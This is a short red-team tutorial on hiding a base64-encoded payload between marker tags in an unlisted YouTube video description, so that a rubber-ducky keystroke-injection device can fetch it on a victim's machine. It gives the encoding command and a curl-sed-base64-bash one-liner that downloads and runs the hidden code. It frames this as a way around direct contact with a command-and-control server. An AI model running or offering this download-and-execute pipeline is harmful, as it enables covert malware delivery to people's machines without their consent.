Hosting malicious payloads on Youtube

Why that?

It’s a trick created during a red team mission, where we have a rubber ducky, which will download a bash script to run the GTRS on the victm machine, but we have problem, the traffic with the C2 will be safe using the GTRS, but the infected machine need to talk directly to the C2 to get our payload, so we had the idea to use Youtube to host our bash payload.

Recipe of Rataria

First of all, create your payload with powershell, bash, python or whatever language you want, then encode it in base64.

base64 -w0 payload

Now upload a video on youtube, make it unlisted and on the video description insert your payload encoded, BUT to make your life easier add a tag at the start and end of the payload, like this, sCmD[YOUPAYLOAD]eCmD, and that’s all, now all you need is execute this command on your rubber ducky payload

curl | sed -n 's/.*sCmD\(.*\)eCmD.*/\1/p' | base64 -d | bash

A tip to shrink the url, is use which is used by twitter.